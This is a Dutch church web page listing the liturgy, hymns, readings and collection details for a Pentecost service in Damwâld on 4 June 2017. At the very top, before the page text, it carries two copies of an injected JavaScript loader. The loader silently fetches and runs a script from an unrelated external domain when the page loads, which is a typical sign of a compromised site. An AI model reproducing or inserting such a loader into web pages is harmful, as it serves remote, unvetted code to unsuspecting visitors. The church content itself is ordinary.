;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 4 juni 2017 9:30 uur - PKN Damwâld
zondag 4 juni 2017
09:30 uur
Pinksteren

Kerkdienst zondag 4 juni 2017 9:30 uur

Informatie

Voorganger:Ds. J. Bakker, Feanwâlden
Organist:Foeke Wiegersma
Mededeling:Pinksteren
Liturgie
Lied voor de dienst Gezang 1
Welkom en mededelingen
Intochtslied Psalm 68 : 1
Stilgebed, bemoediging en groet .
We lezen enkele verzen uit Psalm 68
We zingen: Psalm 68 : 7 en 12
We zingen: Elb 456 : 1 en 2
Gebed om ontferming .
We zingen: Gezang 242 : 1, 3 en 7
Gebed van de zondag .
1ste schriftlezing Joël 3
We zingen: Gezang 39 : 1, 2, 8 en 9
2de schriftlezing Handelingen 2 : 1 - 21
We zingen: Gezang 239 : 1, 4, 6 en 7
Preek
We zingen: Gezang 251 :1 en 2
Collecte
Gebeden, stil gebed en Onze Vader
Slotlied : Gezang 249 : 1, 2 en 3
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Collecte informatie
Eerste collecte: Pinksterzendingscollecte

Kerkopbouw in afgelegen dorpen in Nicaragua
In afgelegen dorpen in Nicaragua hebben kerken geen eigen voorgangers. Leken doen het meeste werk in de kerk. Vaak komt er maar twee keer per jaar een voorganger langs in de kleine geloofsgemeenschappen. De lekenleiders hebben echter beperkte kennis van de Bijbel en van theologie. Via Teyocoyani, partner van Kerk in Actie, krijgen zij trainingen op het gebied van bijbelkennis en gemeenteopbouw. Hierdoor kunnen ze hun diensten beter voorbereiden en zijn ze beter toegerust voor hun taken. Bovendien ervaren ze dat ze niet alleen staan in hun werk.
Teyocoyani traint niet alleen de leiders, maar ook de gemeenteleden krijgen een tijdlang begeleiding.
Op veel plekken kampt de bevolking met armoede, conflicten en migratie. Daarom leert Teyocoyani kerkleden hoe ze iets kunnen betekenen voor elkaar en voor anderen in hun omgeving.
De gemeenten veranderen en groeien zichtbaar door deze aanpak. In 2017 wil Teyocoyani in veertig gemeenten trainingen geven. Een tweedaagse bijbelstudie in een dorp kost bijvoorbeeld € 6 per persoon. De collecte van vandaag is bestemd voor Teyocoyani en andere zendingsprojecten van Kerk in Actie wereldwijd. Van harte aanbevolen!

Tweede collecte: Kerk
Uitganscollecte: Kerk